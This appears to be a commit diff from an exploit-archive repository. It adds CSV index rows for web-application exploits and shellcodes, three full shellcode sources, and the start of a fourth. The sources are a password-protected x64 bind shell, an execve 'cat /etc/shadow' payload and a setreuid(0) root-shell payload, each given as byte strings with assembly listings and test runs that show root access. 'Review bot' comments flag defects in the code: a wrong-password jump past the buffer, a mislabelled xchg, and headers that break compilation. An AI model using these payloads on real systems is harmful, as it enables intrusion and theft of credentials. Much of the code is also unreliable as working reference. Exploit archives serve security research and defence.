50175,exploits/php/webapps/50175.py,"qdPM 9.1 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Leon Trappett",webapps,php, 50175,exploits/php/webapps/50175.py,"qdPM 9.1 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Leon Trappett",webapps,php,
50176,exploits/php/webapps/50176.txt,"qdPM 9.2 - Password Exposure (Unauthenticated)",1970-01-01,"Leon Trappett",webapps,php,
50177,exploits/php/webapps/50177.txt,"Client Management System 1.1 - 'cname' Stored Cross-site scripting (XSS)",1970-01-01,"Mohammad Koochaki",webapps,php, 50177,exploits/php/webapps/50177.txt,"Client Management System 1.1 - 'cname' Stored Cross-site scripting (XSS)",1970-01-01,"Mohammad Koochaki",webapps,php,
50178,exploits/java/webapps/50178.sh,"ApacheOfBiz 17.12.01 - Remote Command Execution (RCE)",1970-01-01,"Adrián Díaz",webapps,java,
50464,exploits/cgi/webapps/50464.rb,"Movable Type 7 r.5002 - XMLRPC API OS Command Injection (Metasploit)",1970-01-01,"Charl-Alexandre Le Brun",webapps,cgi,
50179,exploits/php/webapps/50179.txt,"CMSuno 1.7 - 'tgo' Stored Cross-Site Scripting (XSS) (Authenticated)",1970-01-01,splint3rsec,webapps,php, 50179,exploits/php/webapps/50179.txt,"CMSuno 1.7 - 'tgo' Stored Cross-Site Scripting (XSS) (Authenticated)",1970-01-01,splint3rsec,webapps,php,
50180,exploits/php/webapps/50180.py,"Moodle 3.9 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,lanz,webapps,php, 50180,exploits/php/webapps/50180.py,"Moodle 3.9 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,lanz,webapps,php,
50181,exploits/multiple/webapps/50181.py,"GFI Mail Archiver 15.1 - Telerik UI Component Arbitrary File Upload (Unauthenticated)",1970-01-01,"Amin Bohio",webapps,multiple, 50181,exploits/multiple/webapps/50181.py,"GFI Mail Archiver 15.1 - Telerik UI Component Arbitrary File Upload (Unauthenticated)",1970-01-01,"Amin Bohio",webapps,multiple,
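Review bot: entry 50464 (Movable Type 7 r.5002, Metasploit module) is inserted between 50178 and 50179, which breaks the ascending id order the rest of the file keeps; it belongs after the last 503xx row (50366 is the highest id visible in this diff). Two smaller style points in the same hunk: 50158 writes "Sql Injection Authentication Bypass" where the neighbouring rows (50169, 50360, 50365) use "SQL Injection", and 50171 and 50177 use "Cross-site scripting" where the file otherwise capitalises "Cross-Site Scripting".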
@ -44281,12 +44356,14 @@ id,file,description,date,author,type,platform,port
50208,exploits/hardware/webapps/50208.txt,"COMMAX Smart Home Ruvie CCTV Bridge DVR Service - RTSP Credentials Disclosure",1970-01-01,LiquidWorm,webapps,hardware, 50208,exploits/hardware/webapps/50208.txt,"COMMAX Smart Home Ruvie CCTV Bridge DVR Service - RTSP Credentials Disclosure",1970-01-01,LiquidWorm,webapps,hardware,
50209,exploits/hardware/webapps/50209.txt,"COMMAX Smart Home Ruvie CCTV Bridge DVR Service - Config Write / DoS (Unauthenticated)",1970-01-01,LiquidWorm,webapps,hardware, 50209,exploits/hardware/webapps/50209.txt,"COMMAX Smart Home Ruvie CCTV Bridge DVR Service - Config Write / DoS (Unauthenticated)",1970-01-01,LiquidWorm,webapps,hardware,
50210,exploits/hardware/webapps/50210.txt,"COMMAX CVD-Axx DVR 5.1.4 - Weak Default Credentials Stream Disclosure",1970-01-01,LiquidWorm,webapps,hardware, 50210,exploits/hardware/webapps/50210.txt,"COMMAX CVD-Axx DVR 5.1.4 - Weak Default Credentials Stream Disclosure",1970-01-01,LiquidWorm,webapps,hardware,
50211,exploits/hardware/webapps/50211.txt,"GeoVision Geowebserver 5.3.3 - Local FIle Inclusion",1970-01-01,"Ken Pyle",webapps,hardware,
50213,exploits/php/webapps/50213.txt,"Crime records Management System 1.0 - 'Multiple' SQL Injection (Authenticated)",1970-01-01,"Davide Taraschi",webapps,php, 50213,exploits/php/webapps/50213.txt,"Crime records Management System 1.0 - 'Multiple' SQL Injection (Authenticated)",1970-01-01,"Davide Taraschi",webapps,php,
50214,exploits/php/webapps/50214.py,"Simple Image Gallery 1.0 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,Tagoletta,webapps,php, 50214,exploits/php/webapps/50214.py,"Simple Image Gallery 1.0 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,Tagoletta,webapps,php,
50215,exploits/php/webapps/50215.txt,"COVID19 Testing Management System 1.0 - 'Multiple' SQL Injections",1970-01-01,"Halit AKAYDIN",webapps,php, 50215,exploits/php/webapps/50215.txt,"COVID19 Testing Management System 1.0 - 'Multiple' SQL Injections",1970-01-01,"Halit AKAYDIN",webapps,php,
50217,exploits/php/webapps/50217.txt,"Charity Management System CMS 1.0 - Multiple Vulnerabilities",1970-01-01,"Davide Taraschi",webapps,php, 50217,exploits/php/webapps/50217.txt,"Charity Management System CMS 1.0 - Multiple Vulnerabilities",1970-01-01,"Davide Taraschi",webapps,php,
50220,exploits/php/webapps/50220.txt,"Laundry Booking Management System 1.0 - 'Multiple' Stored Cross-Site Scripting (XSS)",1970-01-01,"Azumah Foresight Xorlali",webapps,php, 50220,exploits/php/webapps/50220.txt,"Laundry Booking Management System 1.0 - 'Multiple' Stored Cross-Site Scripting (XSS)",1970-01-01,"Azumah Foresight Xorlali",webapps,php,
50221,exploits/php/webapps/50221.py,"Online Traffic Offense Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,"Halit AKAYDIN",webapps,php, 50221,exploits/php/webapps/50221.py,"Online Traffic Offense Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,"Halit AKAYDIN",webapps,php,
50223,exploits/php/webapps/50223.txt,"Simple Phone Book 1.0 - 'Username' SQL Injection (Unauthenticated)",1970-01-01,"Justin White",webapps,php,
50224,exploits/php/webapps/50224.py,"RaspAP 2.6.6 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Moritz Gruber",webapps,php, 50224,exploits/php/webapps/50224.py,"RaspAP 2.6.6 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Moritz Gruber",webapps,php,
50226,exploits/php/webapps/50226.py,"WordPress Plugin Mail Masta 1.0 - Local File Inclusion (2)",1970-01-01,"Matheus Alexandre",webapps,php, 50226,exploits/php/webapps/50226.py,"WordPress Plugin Mail Masta 1.0 - Local File Inclusion (2)",1970-01-01,"Matheus Alexandre",webapps,php,
50227,exploits/hardware/webapps/50227.py,"HP OfficeJet 4630/7110 MYM1FN2025AR/2117A - Stored Cross-Site Scripting (XSS)",1970-01-01,"Tyler Butler",webapps,hardware, 50227,exploits/hardware/webapps/50227.py,"HP OfficeJet 4630/7110 MYM1FN2025AR/2117A - Stored Cross-Site Scripting (XSS)",1970-01-01,"Tyler Butler",webapps,hardware,
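Review bot: typo in the description of 50211: "Local FIle Inclusion" should read "Local File Inclusion". The remaining rows in this hunk follow the file's existing naming conventions.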
@ -44302,10 +44379,14 @@ id,file,description,date,author,type,platform,port
50238,exploits/multiple/webapps/50238.py,"Strapi 3.0.0-beta.17.7 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"David Utón",webapps,multiple, 50238,exploits/multiple/webapps/50238.py,"Strapi 3.0.0-beta.17.7 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"David Utón",webapps,multiple,
50239,exploits/multiple/webapps/50239.py,"Strapi CMS 3.0.0-beta.17.4 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,"Musyoka Ian",webapps,multiple, 50239,exploits/multiple/webapps/50239.py,"Strapi CMS 3.0.0-beta.17.4 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,"Musyoka Ian",webapps,multiple,
50240,exploits/php/webapps/50240.txt,"Projectsend r1295 - 'name' Stored XSS",1970-01-01,"Abdullah Kala",webapps,php, 50240,exploits/php/webapps/50240.txt,"Projectsend r1295 - 'name' Stored XSS",1970-01-01,"Abdullah Kala",webapps,php,
50241,exploits/aspx/webapps/50241.py,"Umbraco CMS 8.9.1 - Directory Traversal",1970-01-01,BitTheByte,webapps,aspx,
50242,exploits/php/webapps/50242.sh,"WordPress Plugin ProfilePress 3.1.3 - Privilege Escalation (Unauthenticated)",1970-01-01,"Numan Rajkotiya",webapps,php, 50242,exploits/php/webapps/50242.sh,"WordPress Plugin ProfilePress 3.1.3 - Privilege Escalation (Unauthenticated)",1970-01-01,"Numan Rajkotiya",webapps,php,
50243,exploits/java/webapps/50243.py,"Confluence Server 7.12.4 - 'OGNL injection' Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,"Fellipe Oliveira",webapps,java, 50243,exploits/java/webapps/50243.py,"Confluence Server 7.12.4 - 'OGNL injection' Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,"Fellipe Oliveira",webapps,java,
50244,exploits/php/webapps/50244.py,"Traffic Offense Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,Tagoletta,webapps,php,
50246,exploits/php/webapps/50246.txt,"WordPress Plugin Payments Plugin | GetPaid 2.4.6 - HTML Injection",1970-01-01,"Niraj Mahajan",webapps,php, 50246,exploits/php/webapps/50246.txt,"WordPress Plugin Payments Plugin | GetPaid 2.4.6 - HTML Injection",1970-01-01,"Niraj Mahajan",webapps,php,
50248,exploits/php/webapps/50248.txt,"Dolibarr ERP 14.0.1 - Privilege Escalation",1970-01-01,"Vishwaraj Bhattrai",webapps,php,
50249,exploits/php/webapps/50249.txt,"OpenSIS Community 8.0 - 'cp_id_miss_attn' SQL Injection",1970-01-01,"Eric Salario",webapps,php, 50249,exploits/php/webapps/50249.txt,"OpenSIS Community 8.0 - 'cp_id_miss_attn' SQL Injection",1970-01-01,"Eric Salario",webapps,php,
50250,exploits/hardware/webapps/50250.txt,"Compro Technology IP Camera - 'killps.cgi' Denial of Service (DoS)",1970-01-01,icekam,webapps,hardware,
50251,exploits/hardware/webapps/50251.txt,"Compro Technology IP Camera - RTSP stream disclosure (Unauthenticated)",1970-01-01,icekam,webapps,hardware, 50251,exploits/hardware/webapps/50251.txt,"Compro Technology IP Camera - RTSP stream disclosure (Unauthenticated)",1970-01-01,icekam,webapps,hardware,
50252,exploits/hardware/webapps/50252.txt,"Compro Technology IP Camera - 'Multiple' Credential Disclosure",1970-01-01,icekam,webapps,hardware, 50252,exploits/hardware/webapps/50252.txt,"Compro Technology IP Camera - 'Multiple' Credential Disclosure",1970-01-01,icekam,webapps,hardware,
50253,exploits/hardware/webapps/50253.txt,"Compro Technology IP Camera - ' index_MJpeg.cgi' Stream Disclosure",1970-01-01,icekam,webapps,hardware, 50253,exploits/hardware/webapps/50253.txt,"Compro Technology IP Camera - ' index_MJpeg.cgi' Stream Disclosure",1970-01-01,icekam,webapps,hardware,
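Review bot: 50244 ("Traffic Offense Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)", Tagoletta) and 50221 in the previous hunk ("Online Traffic Offense Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)", Halit AKAYDIN) describe what looks like the same product and bug class; confirm they are distinct findings, or mark the later one with a "(2)" suffix as the file does elsewhere (e.g. 50226 "... Local File Inclusion (2)"). Also in this hunk: the description of 50253 has a stray space inside the quoted parameter name (' index_MJpeg.cgi'), and 50240 abbreviates to "Stored XSS" where the surrounding rows spell out "Stored Cross-Site Scripting (XSS)".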
@ -44387,7 +44468,9 @@ id,file,description,date,author,type,platform,port
50356,exploits/php/webapps/50356.py,"Cmsimple 5.4 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,pussycat0x,webapps,php, 50356,exploits/php/webapps/50356.py,"Cmsimple 5.4 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,pussycat0x,webapps,php,
50357,exploits/php/webapps/50357.txt,"Pharmacy Point of Sale System 1.0 - 'Multiple' SQL Injection (SQLi)",1970-01-01,Murat,webapps,php, 50357,exploits/php/webapps/50357.txt,"Pharmacy Point of Sale System 1.0 - 'Multiple' SQL Injection (SQLi)",1970-01-01,Murat,webapps,php,
50360,exploits/php/webapps/50360.txt,"Exam Form Submission System 1.0 - SQL Injection Authentication Bypass",1970-01-01,"Nitin Sharma",webapps,php, 50360,exploits/php/webapps/50360.txt,"Exam Form Submission System 1.0 - SQL Injection Authentication Bypass",1970-01-01,"Nitin Sharma",webapps,php,
50361,exploits/php/webapps/50361.txt,"Drupal Module MiniorangeSAML 8.x-2.22 - Privilege escalation",1970-01-01,"Cristian \'void\' Giustini",webapps,php,
50362,exploits/php/webapps/50362.txt,"Blood Bank System 1.0 - Authentication Bypass",1970-01-01,"Nitin Sharma",webapps,php, 50362,exploits/php/webapps/50362.txt,"Blood Bank System 1.0 - Authentication Bypass",1970-01-01,"Nitin Sharma",webapps,php,
50363,exploits/php/webapps/50363.txt,"Phpwcms 1.9.30 - Arbitrary File Upload",1970-01-01,"Okan Kurtulus",webapps,php,
50364,exploits/php/webapps/50364.py,"Vehicle Service Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,Ghuliev,webapps,php, 50364,exploits/php/webapps/50364.py,"Vehicle Service Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,Ghuliev,webapps,php,
50365,exploits/php/webapps/50365.txt,"Dairy Farm Shop Management System 1.0 - SQL Injection Authentication Bypass",1970-01-01,"Sanjay Singh",webapps,php, 50365,exploits/php/webapps/50365.txt,"Dairy Farm Shop Management System 1.0 - SQL Injection Authentication Bypass",1970-01-01,"Sanjay Singh",webapps,php,
50366,exploits/multiple/webapps/50366.txt,"WhatsUpGold 21.0.3 - Stored Cross-Site Scripting (XSS)",1970-01-01,"Andreas Finstad",webapps,multiple, 50366,exploits/multiple/webapps/50366.txt,"WhatsUpGold 21.0.3 - Stored Cross-Site Scripting (XSS)",1970-01-01,"Andreas Finstad",webapps,multiple,
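Review bot: the author field of 50361, "Cristian \'void\' Giustini", uses backslash-escaped single quotes, but CSV has no backslash escaping, so the backslashes become part of the stored name. Single quotes need no escaping inside a double-quoted field; write "Cristian 'void' Giustini". In the same row, "Privilege escalation" should be "Privilege Escalation" to match 50138, 50242 and 50248.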

@ -1025,9 +1025,21 @@ id,file,description,date,author,type,platform
48592,shellcodes/linux_x86/48592.c,"Linux/x86 - Disable ASLR Security + Polymorphic Shellcode (124 bytes)",1970-01-01,"Xenofon Vassilakopoulos",shellcode,linux_x86 48592,shellcodes/linux_x86/48592.c,"Linux/x86 - Disable ASLR Security + Polymorphic Shellcode (124 bytes)",1970-01-01,"Xenofon Vassilakopoulos",shellcode,linux_x86
48703,shellcodes/linux_x86/48703.c,"Linux/x86 - Egghunter (0x50905090) + sigaction + execve(/bin/sh) Shellcode (35 bytes)",1970-01-01,danf42,shellcode,linux_x86 48703,shellcodes/linux_x86/48703.c,"Linux/x86 - Egghunter (0x50905090) + sigaction + execve(/bin/sh) Shellcode (35 bytes)",1970-01-01,danf42,shellcode,linux_x86
48718,shellcodes/windows_x86/48718.c,"Windows/x86 - Download File (http://192.168.43.192:8080/9MKWaRO.hta) Via mshta Shellcode (100 bytes)",1970-01-01,"Siddharth Sharma",shellcode,windows_x86 48718,shellcodes/windows_x86/48718.c,"Windows/x86 - Download File (http://192.168.43.192:8080/9MKWaRO.hta) Via mshta Shellcode (100 bytes)",1970-01-01,"Siddharth Sharma",shellcode,windows_x86
49466,shellcodes/windows_x86/49466.asm,"Windows/x86 - Download File (http://10.10.10.5:8080/2NWyfQ9T.hta) Via mshta + Execute + Stager Shellcode (143 bytes)",1970-01-01,"Armando Huesca Prida",shellcode,windows_x86
49472,shellcodes/linux/49472.c,"Linux/x64 - Bind_tcp (0.0.0.0:4444) + Password (12345678) + Shell (/bin/sh) Shellcode (142 bytes)",1970-01-01,"Guillem Alminyana",shellcode,linux
49547,shellcodes/linux_x86-64/49547.c,"Linux/x64 - execve _cat /etc/shadow_ Shellcode (66 bytes)",1970-01-01,"Felipe Winsnes",shellcode,linux_x86-64
49592,shellcodes/windows_x86/49592.asm,"Windows/x86 - Add User Alfred to Administrators/Remote Desktop Users Group Shellcode (240 bytes)",1970-01-01,"Armando Huesca Prida",shellcode,windows_x86
49756,shellcodes/linux/49756.asm,"Linux/x64 - /sbin/halt -p Shellcode (51 bytes)",1970-01-01,"Chenthur Velan",shellcode,linux 49756,shellcodes/linux/49756.asm,"Linux/x64 - /sbin/halt -p Shellcode (51 bytes)",1970-01-01,"Chenthur Velan",shellcode,linux
49768,shellcodes/linux_x86/49768.c,"Linux/x86 - execve(/bin/sh) Shellcode (17 bytes)",1970-01-01,s1ege,shellcode,linux_x86 49768,shellcodes/linux_x86/49768.c,"Linux/x86 - execve(/bin/sh) Shellcode (17 bytes)",1970-01-01,s1ege,shellcode,linux_x86
49770,shellcodes/linux_x86-64/49770.c,"Linux/x64 - execve(/bin/sh) Shellcode (21 bytes) (2)",1970-01-01,s1ege,shellcode,linux_x86-64 49770,shellcodes/linux_x86-64/49770.c,"Linux/x64 - execve(/bin/sh) Shellcode (21 bytes) (2)",1970-01-01,s1ege,shellcode,linux_x86-64
49819,shellcodes/windows_x86-64/49819.c,"Windows/x64 - Dynamic Null-Free WinExec PopCalc Shellcode (205 Bytes)",1970-01-01,boku,shellcode,windows_x86-64
49820,shellcodes/windows_x86-64/49820.c,"Windows/x64 - Dynamic NoNull Add RDP Admin (BOKU:SP3C1ALM0V3) Shellcode (387 Bytes)",1970-01-01,boku,shellcode,windows_x86-64
49855,shellcodes/linux_x86/49855.c,"Linux/x86 - setreuid(0) + execve(_/bin/sh_) Shellcode (29 bytes)",1970-01-01,"Artur Szymczak",shellcode,linux_x86
49976,shellcodes/linux_x86/49976.c,"Linux/x86 - execve /bin/sh Shellcode (fstenv eip GetPC technique) (70 bytes_ xor encoded)",1970-01-01,d7x,shellcode,linux_x86 49976,shellcodes/linux_x86/49976.c,"Linux/x86 - execve /bin/sh Shellcode (fstenv eip GetPC technique) (70 bytes_ xor encoded)",1970-01-01,d7x,shellcode,linux_x86
50124,shellcodes/linux_x86/50124.c,"Linux/x86 - Bind (User Specified Port) Shell (/bin/sh) Shellcode (102 bytes)",1970-01-01,d7x,shellcode,linux_x86
50125,shellcodes/linux_x86/50125.c,"Linux/x86 - Reverse (dynamic IP and port/TCP) Shell (/bin/sh) Shellcode (86 bytes)",1970-01-01,d7x,shellcode,linux_x86
50141,shellcodes/linux_x86/50141.c,"Linux/x86 - Egghunter Reverse TCP Shell dynamic IP and port Shellcode",1970-01-01,d7x,shellcode,linux_x86
50291,shellcodes/windows_x86-64/50291.c,"Windows/x64 - Reverse TCP (192.168.201.11:4444) Shellcode (330 Bytes)",1970-01-01,"Xenofon Vassilakopoulos",shellcode,windows_x86-64 50291,shellcodes/windows_x86-64/50291.c,"Windows/x64 - Reverse TCP (192.168.201.11:4444) Shellcode (330 Bytes)",1970-01-01,"Xenofon Vassilakopoulos",shellcode,windows_x86-64
50368,shellcodes/windows_x86/50368.c,"Windows/x86 - WinExec PopCalc PEB & Export Directory Table NullFree Dynamic Shellcode (178 bytes)",1970-01-01,"Daniel Ortiz",shellcode,windows_x86
50369,shellcodes/windows_x86/50369.c,"Windows/x86 - MessageBoxA PEB & Export Address Table NullFree/Dynamic Shellcode (230 bytes)",1970-01-01,"Daniel Ortiz",shellcode,windows_x86
50384,shellcodes/windows_x86/50384.c,"Windows/x86 - Bind TCP shellcode / Dynamic PEB & EDT method null-free Shellcode (415 bytes)",1970-01-01,"Daniel Ortiz",shellcode,windows_x86 50384,shellcodes/windows_x86/50384.c,"Windows/x86 - Bind TCP shellcode / Dynamic PEB & EDT method null-free Shellcode (415 bytes)",1970-01-01,"Daniel Ortiz",shellcode,windows_x86
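Review bot: the platform column is inconsistent for the x64 rows: 49472 and 49756 are both described as "Linux/x64" but tagged platform "linux" (under shellcodes/linux/), while 49547 and 49770 use "linux_x86-64" (under shellcodes/linux_x86-64/); either normalise the path and platform of 49472 and 49756 or document why two conventions coexist. Separately, every row added in this commit carries the date 1970-01-01, which is the Unix epoch rather than a publication date, while the files themselves state real dates (49472.c: "Date: 2021-01-18", 49547.c: "Date: 02-08-2021"), so the date column appears to have been lost during generation. Minor: 50141 is the only row whose description omits the byte count.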

shellcodes/linux/49472.c Normal file

@ -0,0 +1,107 @@
/*
Exploit Title: Linux/x64 - Bind_tcp (0.0.0.0:4444) + Password (12345678) + Shell (/bin/sh) Shellcode (142 bytes)
Author: Guillem Alminyana
Date: 2021-01-18
Platform: GNU Linux x64
=====================================
Compile:
gcc -fno-stack-protector -z execstack shellcode.c -o shellcode
*/
#include <stdio.h>
#include <string.h>
unsigned char code[]= \
"\x6a\x29\x58\x6a\x02\x5f\x6a\x01\x5e\x48\x31\xd2\x0f\x05\x50\x5f\x52\x52\x66\x68"
"\x11\x5c\x66\x6a\x02\x6a\x31\x58\x54\x5e\xb2\x10\x0f\x05\x6a\x32\x58\x6a\x02\x5e"
"\x0f\x05\x6a\x2b\x58\x48\x31\xf6\x99\x0f\x05\x50\x5f\x6a\x02\x5e\x6a\x21\x58\x0f"
"\x05\x48\xff\xce\x79\xf6\x6a\x01\x58\x49\xb9\x50\x61\x73\x73\x77\x64\x3a\x20\x41"
"\x51\x48\x89\xe6\x6a\x08\x5a\x0f\x05\x48\x31\xc0\x48\x83\xc6\x08\x0f\x05\x48\xb8"
"\x31\x32\x33\x34\x35\x36\x37\x38\x56\x5f\x48\xaf\x75\x1c\x48\x31\xc0\x50\x48\xbb"
"\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\x50\x54\x5a\x57\x54\x5e\x6a\x3b\x58"
"\x0f\x05";
void main()
{
printf("ShellCode Lenght: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}
/*
ASM
0: 6a 29 push 0x29
2: 58 pop rax
3: 6a 02 push 0x2
5: 5f pop rdi
6: 6a 01 push 0x1
8: 5e pop rsi
9: 48 31 d2 xor rdx,rdx
c: 0f 05 syscall
e: 50 push rax
f: 5f pop rdi
10: 52 push rdx
11: 52 push rdx
12: 66 68 11 5c pushw 0x5c11
16: 66 6a 02 pushw 0x2
19: 6a 31 push 0x31
1b: 58 pop rax
1c: 54 push rsp
1d: 5e pop rsi
1e: b2 10 mov dl,0x10
20: 0f 05 syscall
22: 6a 32 push 0x32
24: 58 pop rax
25: 6a 02 push 0x2
27: 5e pop rsi
28: 0f 05 syscall
2a: 6a 2b push 0x2b
2c: 58 pop rax
2d: 48 31 f6 xor rsi,rsi
30: 99 cdq
31: 0f 05 syscall
33: 50 push rax
34: 5f pop rdi
35: 6a 02 push 0x2
37: 5e pop rsi
38: 6a 21 push 0x21
3a: 58 pop rax
3b: 0f 05 syscall
3d: 48 ff ce dec rsi
40: 79 f6 jns 38 <loop_1>
42: 6a 01 push 0x1
44: 58 pop rax
45: 49 b9 50 61 73 73 77 movabs r9,0x203a647773736150
4c: 64 3a 20
4f: 41 51 push r9
51: 48 89 e6 mov rsi,rsp
54: 6a 08 push 0x8
56: 5a pop rdx
57: 0f 05 syscall
59: 48 31 c0 xor rax,rax
5c: 48 83 c6 08 add rsi,0x8
60: 0f 05 syscall
62: 48 b8 31 32 33 34 35 movabs rax,0x3837363534333231
69: 36 37 38
6c: 56 push rsi
6d: 5f pop rdi
6e: 48 af scas rax,QWORD PTR es:[rdi]
70: 75 1c jne 8e <exit_program>
72: 48 31 c0 xor rax,rax
75: 50 push rax
76: 48 bb 2f 62 69 6e 2f movabs rbx,0x68732f2f6e69622f
7d: 2f 73 68
80: 53 push rbx
81: 54 push rsp
82: 5f pop rdi
83: 50 push rax
84: 54 push rsp
85: 5a pop rdx
86: 57 push rdi
87: 54 push rsp
88: 5e pop rsi
89: 6a 3b push 0x3b
8b: 58 pop rax
8c: 0f 05 syscall
*/
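Review bot: the wrong-password branch at offset 0x70, `jne 8e <exit_program>`, targets 0x8e, which is the first byte after the 142-byte buffer (the final `syscall` at 0x8c ends at 0x8e); there is no `exit_program` label or exit syscall inside the shellcode, so on a mismatch execution runs into whatever follows `code[]` in .data and the harness crashes or misbehaves rather than exiting. The listing should at least say that `exit_program` is an external symbol outside the shellcode. On the C side, `void main()` should be `int main(void)`, the `printf` of `strlen(code)` should use `%zu` rather than `%d`, and "Lenght" in that format string is a typo.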

@ -0,0 +1,63 @@
# Exploit Title: Linux/x64 - execve "cat /etc/shadow" Shellcode (66 bytes)
# Date: 02-08-2021
# Author: Felipe Winsnes
# Tested on: Debian x64
# Shellcode Length: 66
/*
global _start
_start:
xor rax, rax ; Zeroes out RAX.
xor rbp, rbp ; Zeroes out RBP.
push rax ; Pushes RAX's NULL-DWORD.
mov rbp, 0x776f646168732f63 ; Moves value "wodahs/c" into RBP.
push rbp ; Pushes the vaueof RBP into the Stack.
mov rbp, 0x74652f2f2f2f2f2f ; Moves value "te//////" into RBP.
push rbp ; Pushes the vaue of RBP into the Stack.
mov rbp, rsp ; Copies the value of the Stack into RBP.
push rax ; Pushes RAX's NULL-DWORD.
mov rbx, 0x7461632f6e69622f ; Moves value "tac/nib/" into RBX.
push rbx ; Pushes the vaue of RBX into the Stack.
mov rbx, rsp ; Copies the value of the Stack into RBX.
mov rdi, rsp ; Copies the value of the Stack into RDI.
push rax ; Pushes RAX's NULL-DWORD.
mov rdx, rsp ; Copies the value of the Stack into RDX. As the previous DWORD was completely NULL, RDX is set to 0.
push rbp ; Pushes the vaue of RBP into the Stack.
push rbx ; Pushes the vaue of RBX into the Stack. The full string should be "cat /etc/shadow".
mov rsi, rsp ; Copies this entire string from the Stack into RSI.
push word 59 ; Pushes the value 59 (syscall value for execve in the x64 format).
pop ax ; Pops this value into AX so there are no NULLs.
syscall ; The syscall is executed.
*/
/*
Usage:
whitecr0wz@SLAE64:~/assembly/execve/cat$ gcc cat_shadow.c -o cat_shadow -fno-stack-protector -z execstack -w
whitecr0wz@SLAE64:~/assembly/execve/cat$ ./cat_shadow
*/
#include <stdio.h>
unsigned char shellcode[] = \
"\x48\x31\xc0\x48\x31\xed\x50\x48\xbd\x63\x2f\x73\x68\x61\x64\x6f\x77\x55\x48\xbd\x2f\x2f\x2f\x2f\x2f\x2f\x65\x74\x55\x48\x89\xe5\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x63\x61\x74\x53\x48\x89\xe3\x48\x89\xe7\x50\x48\x89\xe2\x55\x53\x48\x89\xe6\x66\x6a\x3b\x66\x58\x0f\x05";
int main()
{
int (*ret)() = (int(*)())shellcode;
ret();
}
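Review bot: the five `#`-prefixed header lines at the top of the file (`# Exploit Title:` through `# Shellcode Length: 66`) are read by the C preprocessor as directives, and `#Exploit`, `#Date`, `#Author`, `#Tested` and `#Shellcode` are not valid ones, so the file does not compile as committed; the usage transcript below them must have come from a copy without those lines, since `-w` silences warnings, not errors. Move them into the `/* ... */` comment block. Minor: `#include <stdio.h>` is unused, the assembly comments say "NULL-DWORD" for 64-bit `push rax`, which pushes a QWORD, and "vaue"/"vaueof" are typos.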

@ -0,0 +1,41 @@
/*
Author: Artur [ajes] Szymczak (2021)
Function: Linux x86 shellcode, setreuid to 0 and then execute /bin/sh
Size: 29 bytes
Testing:
$ gcc -fno-stack-protector -z execstack shellcode_tester.c -o shellcode
shellcode_tester.c: In function main:
shellcode_tester.c:25:2: warning: incompatible implicit declaration of built-in function printf [enabled by default]
shellcode_tester.c:25:24: warning: incompatible implicit declaration of built-in function strlen [enabled by default]
$ sudo chown root:root ./shellcode
$ sudo chmod u+s ./shellcode
$ ./shellcode
Length: 29
# id
uid=0(root) gid=1000(artur) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),111(lpadmin),112(sambashare),1000(artur)
*/
char shellcode[] = ""
"\x31\xc0" // clear eax, as we don't know its state
"\xb0\x46" // syscall setreuid
"\x31\xdb" // real user ID = 0
"\x31\xc9" // effective user ID = 0
"\x99" // saved set-user-ID = 0 (using EDX)
"\xcd\x80" // call it
"\x96" // clear eax, as we don't know its state after former syscall
"\xb0\x0b" // syscall execve
"\x53" // NULL string terminator
"\x68\x2f\x2f\x73\x68" // //sh
"\x68\x2f\x62\x69\x6e" // /bin
"\x89\xe3" // pointer to above string - path to the program to execve
"\xcd\x80"; // call it
void main(void)
{
printf("Length: %d\n",strlen(shellcode));
((void(*)(void))shellcode)();
}
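Review bot: the comment on `\x96` ("clear eax, as we don't know its state after former syscall") does not match the instruction: 0x96 is `xchg eax, esi`, so after `setreuid` returns 0 in eax it zeroes esi and loads esi's previous contents into eax; the following `mov al, 0x0b` then only produces syscall 11 if the upper 24 bits of esi happened to be zero, which nothing in the shellcode arranges. Either the comment or the instruction needs correcting. Separately, the testing transcript already shows the warnings this file causes: `printf` and `strlen` are used without `#include <stdio.h>` and `#include <string.h>`, and `void main(void)` should be `int main(void)`.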

@ -0,0 +1,195 @@
# Exploit Title: Linux/x86 - Bind (User Specified Port) Shell (/bin/sh) Shellcode (102 bytes)
# Date: 08/07/2021
# Exploit Author: d7x
# Tested on: Ubuntu x86
/***
Linux/x86 Bind Shell (/bin/sh) with dynamic port binding Null-Free Shellcode (102 bytes)
Usage: gcc -z execstack -o bindshell bindshell.c
./bindshell 7000
Binding to 7000 (0x1b58)
netstat -antlp | grep 7000
tcp 0 0 0.0.0.0:7000 0.0.0.0:* LISTEN 26088/bindshell
nc -nv 127.0.0.1 7000
Connection to 127.0.0.1 7000 port [tcp/*] succeeded!
id
uid=0(root) gid=0(root) groups=0(root)
*** Created by d7x
https://d7x.promiselabs.net
https://www.promiselabs.net ***
***/
#include <stdio.h>
#include <string.h>
unsigned char shellcode[] = \
